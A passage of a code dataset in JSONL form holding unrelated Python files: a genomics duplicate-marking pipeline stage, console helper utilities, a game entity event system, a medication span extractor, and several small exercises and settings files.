read.is_secondary:\n continue\n\n if read.is_unmapped or read.mate_is_unmapped or read.get_tag(SELF_FIVE_PRIME_POS_TAG) == read.get_tag(MATE_FIVE_PRIME_POS_TAG):\n # For unmapped pairs, key off of R1, and only report stats on R1\n read_key = read.is_read1\n else:\n # For mapped pairs, key so that the 5' most mate is primary\n read_key = read.get_tag(SELF_FIVE_PRIME_POS_TAG) < read.get_tag(MATE_FIVE_PRIME_POS_TAG)\n\n # We only need to dedup mapped pairs, but we output stats based on the read_key for consistency\n if read_key:\n self.bc_counts[barcode]['total'] += 1\n if read.is_unmapped or read.mate_is_unmapped:\n self.bc_counts[barcode]['unmapped'] += 1\n\n if read.is_unmapped or read.mate_is_unmapped:\n continue\n\n # The footprint is what we form duplicate groups out of: read barcode if split_bcs is set, and\n # read and mate contig IDs and 5' positions (as given by previously annotated tags)\n footprint = ReadFootprint(barcode if self.split_bcs else None,\n self.contig_lookup[read.reference_id], read.get_tag(SELF_FIVE_PRIME_POS_TAG),\n self.contig_lookup[read.next_reference_id], read.get_tag(MATE_FIVE_PRIME_POS_TAG))\n\n read_tuples.append(NamedRead(footprint, barcode, read))\n\n # Sort and then group by the read footprint. Note that the sort is necessary to group all reads with the\n # same footprint.\n read_tuples.sort(key=lambda x: x.footprint)\n dup_groups = itertools.groupby(read_tuples, lambda x: x.footprint)\n\n for (footprint, dup_group) in dup_groups:\n dup_group = list(dup_group)\n total_dups = len(dup_group)\n contig = footprint.ref_id\n if total_dups > 1:\n optical_dups, diffusion_dups = self.count_dups_by_distance(dup_group)\n else:\n optical_dups = 0\n diffusion_dups = 0\n non_proximal_dups = total_dups - max(diffusion_dups, optical_dups)\n\n dup_group_barcodes = Counter()\n for namedread in dup_group[:non_proximal_dups]:\n if namedread.barcode is not None:\n dup_group_barcodes[namedread.barcode] += 1\n if not dup_group_barcodes:\n most_common_barcode = None\n else:\n # Use raw read counts per barcode to break ties in determining the best barcode\n if self.priors is None:\n most_common_barcode = dup_group_barcodes.most_common(1)[0][0]\n else:\n max_count = max(dup_group_barcodes.values())\n common_barcodes = [bc for bc, count in dup_group_barcodes.iteritems()\n if count == max_count]\n most_common_barcode = max(common_barcodes, key=lambda bc: self.priors[bc])\n\n # Identify the unique duplicate out of the group as the one with the minimum query name to be consistent\n # between this dup group and its read pairs\n unique_dup_index = min([(i, dup_group[i].read.query_name) for i in range(total_dups)\n if dup_group[i].barcode == most_common_barcode], key=lambda x: x[1])[0]\n\n unique_read = dup_group[unique_dup_index].read\n\n # NOTE: this means that number of dups as per BAM tag is slightly different from number of dups counted\n # by discarding lowmapq, mito or chimeric fragments.\n for i in range(0, total_dups):\n dup_group[i].read.is_duplicate = True\n unique_read.is_duplicate = False\n\n fragment_mapq = min(unique_read.mapping_quality, unique_read.get_tag(MATE_MAPPING_QUALITY_TAG))\n primary_contigs_set = set(self.primary_contigs)\n # Make sure we only output data for one read dup group of each read pair\n equal_positions = footprint.position == footprint.mate_position\n if footprint.position <= footprint.mate_position:\n if fragment_mapq <= LOW_MAPQ_THRESHOLD:\n # Count chimerically mapped fragments with identical 5' tags for each read only once\n for read in (dup_group[i] for i in range(total_dups) if not equal_positions or dup_group[i].read.is_read1):\n self.bc_counts[read.barcode][\"lowmapq\"] += 1\n elif contig in self.mito_contigs:\n for read in (dup_group[i] for i in range(total_dups) if not equal_positions or dup_group[i].read.is_read1):\n self.bc_counts[read.barcode][\"mitochondrial\"] += 1\n elif is_chimeric_fragment(unique_read) or contig not in primary_contigs_set:\n # Note that we've added fragments mapping to supplementary contigs here\n for read in (dup_group[i] for i in range(total_dups) if not equal_positions or dup_group[i].read.is_read1):\n self.bc_counts[read.barcode][\"chimeric\"] += 1\n else:\n self.bc_counts[most_common_barcode][\"passed_filters\"] += 1\n for dup_read in (dup_group[i] for i in range(total_dups) if i != unique_dup_index):\n self.bc_counts[dup_read.barcode][\"duplicate\"] += 1\n if most_common_barcode is not None:\n # Write out the output fragments\n start, stop = adjusted_position_pairs(unique_read)\n if start is not None and stop is not None:\n start = max(0, start)\n stop = min(stop, self.contig_lengths[contig])\n self.output_tsv.write('{contig}\\t{start}\\t{stop}\\t'\n '{most_common_barcode}\\t'\n '{non_proximal_dups}\\n'.format(**locals()))\n\n for read in reads:\n self.output_bam.write(read)\n\n @consumer\n def read_consumer(self):\n # bam is sorted by SELF_FIVE_PRIME_POS tag, chrom and pos.\n current_bam_key = (-1, -1)\n current_reads = []\n try:\n while True:\n # accept the next read\n read = (yield)\n\n new_bam_key = (read.reference_id, read.get_tag(SELF_FIVE_PRIME_POS_TAG))\n\n # If the dup group gets extremely large we can run out of memory.\n # Process things in groups of 500K to prevent memory blow-up\n # May cause us to miss a few dups, but it doesn't really matter in these crazy regions\n if new_bam_key != current_bam_key or len(current_reads) > 500000:\n process_reads = current_reads\n current_reads = []\n current_bam_key = new_bam_key\n\n if len(process_reads) > 0:\n self.process_read_block(process_reads)\n\n # accumulate block of reads with same start position\n current_reads.append(read)\n\n except GeneratorExit:\n # Finish up final batch\n self.process_read_block(current_reads)\n return\n\n\ndef split(args):\n # Chunk bam to get 1GB per chunk\n bam_in = create_bam_infile(args.input)\n bam_chunk_size_disk = 0.75\n chunk_defs = tk_bam.chunk_bam_records(bam_in, chunk_bound_func, chunk_size_gb=bam_chunk_size_disk)\n\n for chunk in chunk_defs:\n chunk['__mem_gb'] = 4\n chunk['__vmem_gb'] = 5 + int(np.ceil(2 * whitelist_mem_gb(args.barcode_whitelist) + bam_chunk_size_disk * 10))\n\n lane_coord_sys = tk_lane.LaneCoordinateSystem()\n\n # Reopen BAM for estimating tile extents\n bam_in = create_bam_infile(args.input)\n lane_coord_sys.estimate_tile_extents(bam_in)\n for cnum, chunk in enumerate(chunk_defs):\n chunk['lane_map'] = lane_coord_sys.to_dict()\n chunk['chunk_num'] = cnum\n\n return {'chunks': chunk_defs, 'join': {'__mem_gb': 8, '__threads': 4}}\n\n\ndef join(args, outs, chunk_defs, chunk_outs):\n outs.coerce_strings()\n\n # Merge the output bam files with duplicates marked\n hierarchical_merge_bam([c.output for c in chunk_outs], outs.output, tag=None,\n threads=martian.get_threads_allocation())\n outs.index = index_bam(outs.output, martian.get_threads_allocation())\n\n # Merge the barcode counts from each chunk and write out our singlecell_mapping file\n barcode_whitelist = load_barcode_whitelist(args.barcode_whitelist, ordered=True)\n sorted_barcodes = []\n if args.raw_barcode_counts is not None:\n with open(args.raw_barcode_counts, 'r') as infile:\n raw_counts = json.load(infile)\n sorted_barcodes = ['{}-{}'.format(barcode, gem_group)\n for gem_group in raw_counts\n for barcode in sorted(barcode_whitelist)]\n barcode_counts = {}\n for chunk in chunk_outs:\n with open(chunk.singlecell_mapping, 'r') as infile:\n chunk_counts = pickle.load(infile)\n for barcode, count_dict in chunk_counts.iteritems():\n if barcode not in barcode_counts:\n barcode_counts[barcode] = Counter()\n barcode_counts[barcode] += Counter(count_dict)\n\n with open(outs.singlecell_mapping, 'w') as outfile:\n outfile.write(\"barcode,\")\n outfile.write(\",\".join(SINGLE_CELL_KEYS))\n outfile.write(\"\\n\")\n if None in barcode_counts:\n outfile.write(\"{},\".format(NO_BARCODE))\n outfile.write(\",\".join([str(barcode_counts[None][key]) for key in SINGLE_CELL_KEYS]))\n outfile.write(\"\\n\")\n for barcode in (bc for bc in sorted_barcodes if bc in barcode_counts):\n outfile.write(\"{},\".format(barcode))\n outfile.write(\",\".join([str(barcode_counts[barcode][key]) for key in SINGLE_CELL_KEYS]))\n outfile.write(\"\\n\")\n\n # Merge the fragment file\n base_file, extension = os.path.splitext(outs.fragments)\n if not extension == '.gz':\n raise ValueError('Expecting compressed file output')\n input_tsvs = [str(chunk.fragments) for chunk in chunk_outs]\n merge_keyed_bed(input_tsvs, base_file, threads=martian.get_threads_allocation())\n if os.path.getsize(base_file) == 0:\n outs.fragments = None\n outs.fragments_index = None\n return\n\n # N.B. tabix_index will automatically compress the input file, adding the .gz suffix\n pysam.tabix_index(base_file, preset='bed', index=outs.fragments_index)\n\n\ndef main(args, outs):\n \"\"\"Mark exact duplicate reads in the output BAM file while also writing out some summary statistics.\n PCR duplicates have the same read1 start site and read2 start site.\n \"\"\"\n args.coerce_strings()\n outs.coerce_strings()\n\n # Chunk output doesn't get indexed\n outs.fragments_index = None\n outs.index = None\n\n # Pull in prior likelihoods for barcodes\n raw_barcode_abundance = None\n barcode_whitelist = load_barcode_whitelist(args.barcode_whitelist)\n if args.raw_barcode_counts is not None and barcode_whitelist is not None:\n with open(args.raw_barcode_counts, 'r') as infile:\n raw_counts = json.load(infile)\n raw_barcode_abundance = {'{}-{}'.format(barcode, gem_group): count\n for gem_group, subdict in raw_counts.iteritems()\n for barcode, count in zip(barcode_whitelist, subdict['bc_counts'])}\n\n bam_in = create_bam_infile(args.input)\n bam_refs = bam_in.references\n\n bam_prefix, ext = os.path.splitext(outs.output)\n raw_bam_file = martian.make_path(bam_prefix + '_five_prime_pos_sorted' + ext)\n\n frag_prefix, ext = os.path.splitext(outs.fragments)\n raw_frag_file = martian.make_path(frag_prefix + '_raw' + ext)\n\n # only write CO line for one chunk, so we don't have duplicates after samtools merge\n if args.chunk_num == 0:\n COs = ['10x_bam_to_fastq:R1(SEQ:QUAL,TR:TQ)',\n '10x_bam_to_fastq:R2(SEQ:QUAL,TR:TQ)',\n '10x_bam_to_fastq:I1(BC:QT)',\n '10x_bam_to_fastq:I2(CR:CY)',\n '10x_bam_to_fastq_seqnames:R1,R3,I1,R2']\n else:\n COs = None\n\n bam_out, _ = tk_bam.create_bam_outfile(raw_bam_file, None, None, template=bam_in,\n pgs=[tk_bam.make_pg_header(martian.get_pipelines_version(),\n \"mark_duplicates\",\n TENX_PRODUCT_NAME)],\n cos=COs)\n fragments_out = open(raw_frag_file, 'w')\n bam_in.reset()\n\n # Ensure the summary key indicates what kind of dup marking was actually performed.\n lane_coord_sys = tk_lane.LaneCoordinateSystem.from_dict(args.lane_map)\n reference_manager = ReferenceManager(args.reference_path)\n summarizer = DupSummary(split_bcs=False,\n lane_coordinate_system=lane_coord_sys,\n output_bam=bam_out,\n output_tsv=fragments_out,\n ref=reference_manager,\n bam_refs=bam_refs,\n priors=raw_barcode_abundance)\n\n # Now broadcast the selected reads to the summarizers\n consumers = [summarizer.read_consumer()]\n source = tk_bam.read_bam_chunk(bam_in, (args.chunk_start, args.chunk_end))\n broadcast(source, consumers)\n\n # Close outfiles\n bam_out.close()\n fragments_out.close()\n\n # Feed the chunk barcode_counts data back to join()\n with open(outs.singlecell_mapping, 'w') as outfile:\n pickle.dump(summarizer.bc_counts, outfile)\n\n # Sort the output bam & tsv files\n sort_bam(raw_bam_file, outs.output, threads=martian.get_threads_allocation())\n sort_bed(raw_frag_file, outs.fragments, genome=reference_manager.fasta_index,\n threads=martian.get_threads_allocation(), leave_key=True)\n","sub_path":"mro/atac/stages/processing/mark_duplicates/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":21483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"276203544","text":"from os import path, system\n\n\ndef tit(txt):\n t = int(len(txt) + 8)\n print('-' * t)\n print(f'{txt:^{t}}')\n print('-' * t)\n\n\ndef cls():\n android: bool = path.exists('/storage/emulated/0')\n windows: bool = path.exists('C:/Program Files')\n linux: bool = path.exists('/home/')\n if android or linux:\n system('clear')\n if windows:\n system('cls')\n\n\ndef limpa():\n \"\"\"\n Função que limpa a tela\n \"\"\"\n if path.isdir('C:/'):\n system('cls')\n if path.isdir('/storage/emulated/0/'):\n system('clear')\n\n\n# noinspection PyArgumentList\ndef linque(caminho, form='r', asci=True):\n \"\"\"\n Função que linca o arquivo\n :type asci: bool\n :type form: object\n :param caminho: indica o caminho do arquivo\n :param asci: leitura de códigos ascii, que\n para ativar escreva False para ele\n :return: a\n \"\"\"\n if path.isfile(caminho, form):\n return open(caminho, form, ensure_ascii=asci)\n\n\ndef pc():\n if path.isdir('C:/'):\n return 'windows'\n elif path.isdir('/storage/emulated/0/'):\n return 'android/linux'\n\n\ndef rinput(texto: object, b: object = None, enfeite: object = ':', errormsg = 'Tente novamente.'):\n \"\"\"\n Função que não para de executar input\n até que você digite alguma coisa ou\n digite a coisa correta.\n :type texto: object\n :param texto: Exibe no input\n :type b: object\n :param b: lista de condição\n :return: var c\n \"\"\"\n if b is None:\n b = False\n cont = -1\n while True:\n cont += 1\n if cont == 0:\n c = input(f'{texto}{enfeite} ')\n else:\n c = input(f'{errormsg}\\n{texto}{enfeite} ')\n if c == '':\n limpa()\n pass\n else:\n if not b:\n return str(c)\n else:\n if c in b:\n return str(c)\n else:\n pass\n","sub_path":"canivete.py","file_name":"canivete.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"484819309","text":"'''\n By: Bearded_Mucassi[lmucassi]\n Given a string, find the first non-repeating character in it and return its index.\n If it doesn't exist, return -1. # Note: all the input strings are already lowercase.\n'''\n\ndef first_uniqchar1(c):\n frequency = {}\n for i in c:\n if i not in frequency:\n frequency[i] = 1\n else:\n frequency[i] += 1\n for i in range(len(c)):\n if frequency[c[i]] == 1:\n return i \n return -1\n\nprint(first_uniqchar1('alphabet'))\nprint(first_uniqchar1('barbados'))\nprint(first_uniqchar1('crunchy'))\n","sub_path":"string/first_unique_char/first_uniqchar1.py","file_name":"first_uniqchar1.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"116633417","text":"# coding=utf-8\n# entityscript.py\n# created on 2020/8/31\n# author @zoloypzuo\n# usage: entityscript\nimport stategraph\nfrom common.zglobal import load_script\nfrom common.zlogger import logger_tail, logger\nfrom common.ztable import Table\n\n\ndef add_listener(t, event, inst, fn):\n \"\"\"\n 事件表t的结构:\n t[event] -> listeners\n listeners[inst] -> fns\n :param t:\n :param event:\n :param inst:\n :param fn:\n :return:\n \"\"\"\n assert t is not None\n listeners = t.get(event, None)\n if not listeners:\n listeners = {}\n t[event] = listeners\n listener_fns = listeners.get(inst, None)\n if not listener_fns:\n listener_fns = []\n listeners[inst] = listener_fns\n listener_fns.append(fn)\n\n\ndef remove_listener(t, event, inst, fn):\n if not t:\n return\n listeners = t.get(event, None)\n if not listeners:\n return\n listener_fns = listeners.get(inst, None)\n if listener_fns:\n listener_fns.remove(fn)\n # 删除fn后检查其容器,如果空,删除它\n if not listener_fns:\n del listeners[inst]\n if not listeners:\n del t[event]\n\n\nclass EntityScript(object):\n \"\"\"\n Attributes:\n brain:\n brainfn:\n sg:\n event_listeners:\n event_listening:\n \"\"\"\n\n def __init__(self):\n super(EntityScript, self).__init__()\n self.tags = set()\n self.brain = None\n self.brainfn = None\n self.sg = None\n self.event_listeners = {} # 也可以由listen_for_event初始化\n self.event_listening = {}\n\n self.components = Table()\n\n # ---------------------------------------------------\n # 事件系统\n # ---------------------------------------------------\n @logger\n def push_event(self, event, data=None):\n \"\"\"\n 触发self上的事件\n :param event:\n :param data:\n :return:\n \"\"\"\n # entity\n if self.event_listeners:\n listeners = self.event_listeners.get(event, None)\n if listeners:\n # 拷贝一份回调列表,以防一些handler中listener列表被修改\n to_call = []\n for ent, fns in listeners.iteritems():\n for fn in fns:\n to_call.append(fn)\n for fn in to_call:\n fn(data) # NOTE python use bound-method, DONT pass self into fn\n\n # sg\n if self.sg and self.sg.is_listening_for_event(event) and stategraph.SGManager.on_push_event(self.sg):\n self.sg.push_event(event, data)\n\n # brain\n if self.brain:\n self.brain.push_event(event, data)\n\n def listen_for_event(self, event, fn, source=None):\n \"\"\"\n 监听者self,监听事件源的事件\n :param source:\n :param event:_\n :param fn:\n :return:\n \"\"\"\n # 事件源,被监听者,默认为None,本来是参数,为了简化去掉了\n source = source or self\n if not source.event_listeners:\n source.event_listeners = {}\n # 被监听者的监听者表\n add_listener(source.event_listeners, event, self, fn)\n # 监听者的正在监听表\n add_listener(self.event_listening, event, source, fn)\n\n def remove_event_callback(self, event, fn, source=None):\n \"\"\"\n listen_for_event的逆操作\n :param event:\n :param fn:\n :param source:\n :return:\n \"\"\"\n source = source or self\n remove_listener(source.event_listeners, event, self, fn)\n remove_listener(self.event_listening, event, source, fn)\n\n def remove_all_event_callbacks(self):\n \"\"\"\n /\n :return:\n \"\"\"\n # 不再监听事件\n if self.event_listening:\n for event, sources in self.event_listening.iteritems():\n for source, fns in sources.iteritems():\n if source.event_listeners:\n listeners = source.event_listeners.get(event, None)\n if listeners:\n del listeners[self]\n self.event_listening = {}\n if self.event_listeners:\n for event, listeners in self.event_listeners.iteritems():\n for listener, fns in listeners.iteritems:\n if listener.event_listening:\n sources = listener.event_listening.get(event, None)\n if sources:\n del sources[self]\n self.event_listeners = {}\n\n @logger_tail\n def dump_event_map(self):\n return self.event_listening, self.event_listeners\n\n # ---------------------------------------------------\n # stategraph\n # ---------------------------------------------------\n def set_stategraph(self, name):\n stategraph.set_stategraph(self, name)\n\n def clear_stategraph(self):\n stategraph.clear_stategraph(self)\n\n # ---------------------------------------------------\n # brain\n # ---------------------------------------------------\n @logger\n def restart_brain(self):\n self.stop_brain()\n if not self.brainfn:\n return\n self.brain = self.brainfn()\n if not self.brain:\n return\n self.brain.inst = self\n self.brain.start()\n\n @logger\n def stop_brain(self):\n self.brain and self.brain.stop()\n self.brain = None\n\n @logger\n def set_brain(self, brainfn):\n self.brainfn = brainfn\n self.restart_brain()\n\n # ---------------------------------------------------\n # 生命周期\n # ---------------------------------------------------\n def is_valid(self):\n \"\"\"\n C++层是否存活\n :return:\n \"\"\"\n # return self.entity:IsValid() and not self.retired\n return True\n\n @logger\n def return_to_scene(self):\n self.restart_brain()\n self.sg and self.sg.start()\n\n @logger\n def remove_from_scene(self):\n self.stop_brain()\n self.sg and self.sg.stop()\n\n # ---------------------------------------------------\n # component\n # ---------------------------------------------------\n def add_component(self, name, *args, **kwargs):\n if name in self.components:\n raise \"component %s already exists!\" % name\n cmptfn = load_script('components.', name)\n assert cmptfn, \"component %s does not exists!\" % name\n cmpt = cmptfn(self, *args, **kwargs)\n self.components[name] = cmpt\n\n def remove_component(self, name):\n cmpt = self.components[name]\n if not cmpt:\n return\n del self.components[name]\n on_remove_from_entity = getattr(cmpt, \"on_remove_from_entity\", None)\n on_remove_from_entity and on_remove_from_entity()\n\n def has_component(self, name):\n return name in self.components\n\n def get_component(self, name):\n return self.components[name]\n\n def get_component_try(self, name):\n return self.components[name] if self.has_component(name) else None\n\n def get_component_of_type(self, name):\n cls = load_script('components.', name)\n for _, cmpt in self.components:\n if isinstance(cmpt, cls):\n return cmpt\n return None\n\n # ---------------------------------------------------\n # tag\n # ---------------------------------------------------\n def add_tag(self, tag):\n self.tags.add(tag)\n\n def remove_tag(self, tag):\n self.tags.discard(tag)\n\n def has_tag(self, tag):\n return tag in self.tags\n\n # ---------------------------------------------------\n # meta-methods\n # ---------------------------------------------------\n def __str__(self):\n return \"EntityScript\" + repr((id(self),))\n\n __repr__ = __str__\n\n\nif __name__ == '__main__':\n pass\n","sub_path":"Prototype/entityscript.py","file_name":"entityscript.py","file_ext":"py","file_size_in_byte":7951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"353257974","text":"import sys\n\nfile = open(sys.argv[1],'r').read()\nfile = file.lower()\n\nfileName = sys.argv[1].split('/')[-1]\n\nentries = open(sys.argv[2],'r')\nentries = entries.readlines()\n\ncounter = 0\n\nfinalOutput = []\n\ndef chk(word,counter):\n\tif word[0]>='a' and word[0]<='z':\n\t\tif file[counter-1] >='a' and file[counter-1]<='z':\n\t\t\treturn False\n\t\tif file[counter+len(word)] >='a' and file[counter+len(word)]<='z':\n\t\t\treturn False\n\n\tif word[0]>='0' and word[0]<='9':\n\t\tif file[counter-1] >='0' and file[counter-1]<='9':\n\t\t\treturn False\n\t\tif file[counter+len(word)] >='0' and file[counter+len(word)]<='9':\n\t\t\treturn False\n\n\treturn True\n\n\n\ndef addPunct(counter):\n\t#.......................punct.\t\n\t# ind = counter+1\n\t# while ind 0 and (file[counter] == ' ' or file[counter] == 'x' or file[counter] == '/n' or (file[counter] >= '0' and file[counter] <= '9' )):\n\t\tcounter-=1\n\tif counter != counter2:\n\t\tcounter+=1\n\tif counter2 == counter:\n\t\treturn counter\n\twhile file[counter] == ' ':\n\t\tcounter+=1\n\treturn counter\n\n\nfor line in entries:\n\tline = line[:-1]\n\tpres_entry = line.split('\\t')\n\tif len(pres_entry) < 3:\n\t\tcontinue\n\n\t#...........unhandled .............................\n\tif pres_entry[-1] == '0':\n\t\tif pres_entry[0] == \"medications\" or pres_entry[0] == \"medication\" or pres_entry[0] == \"supplementation\" or pres_entry[0] == \"morning\" or pres_entry[0] == \"times\" or pres_entry[0] == \"day\" or pres_entry[0] == \"once\" or pres_entry[0] == \"days\" or pres_entry[0] == \"minutes\" or pres_entry[0] == \"a.m.\" or pres_entry[0] == \"p.m.\" or pres_entry[0] == \"once\"or pres_entry[0] == \"every\" :\n\t\t\tpres_entry[-1] = \"medication\"\n\t\telse :\n\t\t\tcontinue\n\tword = pres_entry[0]\n\t\n\twhile counter + len(word) < len(file) :\n\t\n\t\tif word == file[counter:counter+len(word)].replace(\"^[0-9a-z]\",\" \") and chk(word,counter):\n\t\t\tbreak\n\t\tcounter+=1\n\t# print(counter,counter+len(word),file[counter:counter+len(word)])\n\tstrt = counter\n\tend = counter+len(word)\n\t# strt=addNumber(counter)\n\t# end = addPunct(counter+len(word))\n\t# print(strt,end)\n\t# print(word)\n\tinsert = [fileName , strt , end , file[strt:end] , pres_entry[-1]]\n\t# print(insert)\n\tfinalOutput.append(insert)\n\tcounter+=1\n\nfor i in range(len(finalOutput)):\n\tif i < len(finalOutput)-1 and finalOutput[i][1] == finalOutput[i+1][1] :\n\t\tcontinue\t\n\tif \ti < len(finalOutput)-1 and int(finalOutput[i][2]) + 3 >= int(finalOutput[i+1][1]):\n\t\tfinalOutput[i+1][1] = finalOutput[i][1]\n\t\tfinalOutput[i+1][3] = finalOutput[i][3] +\" \"+ finalOutput[i+1][3]\n\t\tcontinue\n\tif \ti < len(finalOutput)-1 and int(finalOutput[i][2]) >= int(finalOutput[i+1][1]):\n\t\tfinalOutput[i+1] = [finalOutput[i][0] , finalOutput[i][1],finalOutput[i+1][2],file[int(finalOutput[i][1]):int(finalOutput[i+1][2])],finalOutput[i][-1] if (finalOutput[i][-1] != \"0\" ) else finalOutput[i+1][-1]]\n\t\tcontinue\n\n\tx = finalOutput[i]\t\n\n\tfl = True\n\tfor a in x[3]:\n\t\tx[3] = x[3].strip()\n\t\tif a>=\"a\" and a<=\"z\" :\n\t\t\tfl = False\n\tif fl:\n\t\tcontinue\n\tx[3]=x[3].lower()\n\tif x[3].strip() == \"home\" or x[3].strip() == \"blood\" or x[3].strip() == \"day\" or x[3].strip() == \"days.\" or x[3].strip() == \"dep\" or x[3].strip() == \"days\" or x[3].strip() == \"every\" or len(x[3].strip())<=3 :\n\t\tcontinue\n\tx = [str(i) for i in x]\n\ts = x[0]+'|'+x[1]+'-'+x[2]+'|'+x[3]+'|'+x[4]\n\tprint(s)\n","sub_path":"007_medicationHandler.py","file_name":"007_medicationHandler.py","file_ext":"py","file_size_in_byte":3747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"617112337","text":"def main():\n s = input()\n x_up = y_up = z_up = -float('Inf')\n x_down = y_down = z_down = float('Inf')\n while s != \"\":\n x, y, z = map(float, s.split(','))\n if (x > x_up):\n x_up = x\n if (x < x_down):\n x_down = x\n if (y > y_up):\n y_up = y\n if (y < y_down):\n y_down = y\n if (z > z_up):\n z_up = z\n if (z < z_down):\n z_down = z\n s = input()\n print((x_up - x_down) * (y_up - y_down) * (z_up - z_down))\n\nif __name__ == \"__main__\":\n main()","sub_path":"02_Conditionals/dot_box.py","file_name":"dot_box.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"579404975","text":"class person:\n def setvalues(self, name, age):\n self.age = age\n self.name = name\n\n def printvalues(self):\n print(self.name)\n print(self.age)\n\n\nclass bank(person):\n bnkname=\"SDK\"\n def __init__(self, ac_no, name, bal):\n self.ac_no = ac_no\n self.name = name\n self.bal = bal\n\n def balenq(self):\n print(\"Ac No :\", self.ac_no)\n print(\"Name :\", self.name)\n print(\"Balance:\", self.bal)\n\n def withdraw(self, amount):\n if amount > self.bal:\n print(\"Insuffiient balance\\nAvailable balance:\", self.bal)\n else:\n self.bal -= amount\n print(\"Amount withdrawn:\", amount, \"\\nBalance amount:\", self.bal)\n\n def deposit(self, amount):\n self.bal += amount\n print(\"Amount deposited:\", amount, \"\\nBalance amount:\", self.bal)\n\nobj = bank(1001, \"Manu,\", 30000)\nn = 1\nwhile (n == 1):\n print(\"1.Check Ac details\\n2.Deposit\\n3.Withdraw\\n4.exit\")\n x = int(input(\"Enter your choice: \"))\n if x == 1:\n obj.balenq()\n elif x == 2:\n y = int(input(\"Enter amount to deposit: \"))\n obj.deposit(y)\n elif x == 3:\n z = int(input(\"Enter amount to withdraw: \"))\n obj.withdraw(z)\n elif x == 4:\n n = 0\n break\n else:\n print(\"Invalid entry\")\n n = int(input(\"\\nprogram exiting....Press '1' to return to main menu:\"))\n","sub_path":"Luminar/Copy/Language fundamentals/oops/bankapp.py","file_name":"bankapp.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"434784727","text":"from settings import *\n\nINSTALLED_APPS.append('gencmd')\nINSTALLED_APPS.append('django_nose')\nTEST_RUNNER = 'django_nose.NoseTestSuiteRunner'\n# ROOT_URLCONF = 'gencmd.tests.api_urls'\n# MEDIA_URL = 'http://localhost:8080/media/'\n\n# LOGGING = {\n # 'version': 1,\n # 'disable_existing_loggers': True,\n # 'handlers': {\n # 'simple': {\n # 'level': 'ERROR',\n # 'class': 'core.utils.SimpleHandler',\n # }\n # },\n # 'loggers': {\n # 'django.request': {\n # 'handlers': ['simple'],\n # 'level': 'ERROR',\n # 'propagate': False,\n # },\n # }\n# }\n","sub_path":"tests/settings_gencmd.py","file_name":"settings_gencmd.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"341410066","text":"# 5. Weryfikacja obciążenia konta.\n\n# Plik o nazwie charge_accounts.txt zawiera listę numerów kont firmowych.\n# Każdy numer jest siedmiocyfrową liczbą, taką jak 5658845. Opracuj program\n# wczytujący zawartość tego pliku do listy. Naśtępnie użytkownik powinien mieć\n# możliwość podania numeru konta, a program ma sprawdzić czy to jest poprawny\n# numer, szukając go na liście.\n\ndef getFile():\n file = open(\"charge_accounts.txt\", 'r')\n readFile = file.readlines()\n file.close()\n return readFile\n\ndef getConvertNumber(number):\n index = 0\n while index < len(number):\n number[index] = int(number[index])\n index += 1\n\n print(number)\n\n return number\n\ndef getNumber():\n accountNumber = int(input(\"Wpisz numer rachunku: \"))\n\n return accountNumber\n\ndef main():\n openFile = getFile()\n converNumber = getConvertNumber(openFile)\n accountNumber = getNumber()\n\n if accountNumber in converNumber:\n print(\"ok\")\n else:\n print(\"zle\")\n\nmain()","sub_path":"Rozdzial7/5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"539819272","text":"from math import pi\nimport matplotlib.pyplot as plt\n\ndef radar_plot(data,title='Radar'):\n\t\"\"\"\n\t\"\"\"\n\tAttributes =list(data.keys())\n\tAttNo = len(Attributes)\n\tvalues = list(data.values())\n\tvalues += values [:1]\n\tangles = [n / float(AttNo) * 2 * pi for n in range(AttNo)]\n\tangles += angles [:1]\n\tfigureEUI=plt.figure()\n\t\n\tax=figureEUI.add_subplot(2,2,1)\n\tax = plt.subplot(111, polar=True)\n\t#Add the attribute labels to our axes\n\tplt.xticks(angles[:-1],Attributes)\n\n\t#Plot the line around the outside of the filled area, using the angles and values calculated before\n\tax.plot(angles,values)\n\n\t#Fill in the area plotted in the last line\n\tax.fill(angles, values, 'teal', alpha=0.1)\n\n\t#Give the plot a title and show it\n\tax.set_title(title)\n\tplt.show()","sub_path":"core/drawing.py","file_name":"drawing.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"453469276","text":"#author Tom Ruijgrok\n\nimport matplotlib.pyplot as plt \nimport numpy as np \n\n#variables:\n\nv0 = 10 #m/s\nx0 = 0 #m\nm = 200 #kg\ndt = 0.01\nt0 = 0 \nt1 = 10\n\nt = np.linspace(t0, t1,int(1+(t1-t0)/dt))\n\ndef verplaatsingnumeriek(t):\n x_num = np.zeros(len(t))\n v_num = np.zeros(len(t))\n x_num[0] = x0\n v_num[0] = v0\n for n in range(len(t)-1):\n a = (-10*(v_num[n])**3)/m\n x_num[n+1] = x_num[n] + v_num[n]*dt\n v_num[n+1] = v_num[n] + a*dt\n return a, x_num, v_num\n\na, x_num, v_num = verplaatsingnumeriek(t)\n\nprint('v:', v_num[-1], 'm/s')\nprint('s:', x_num[800] ,'m')\n\n","sub_path":"Opgave 2/2C.py","file_name":"2C.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"115934795","text":"from flask import Flask,render_template\nimport pandas as pd\nfrom bs4 import BeautifulSoup\nimport requests\nimport mission_to_mars as mtm\n\napp = 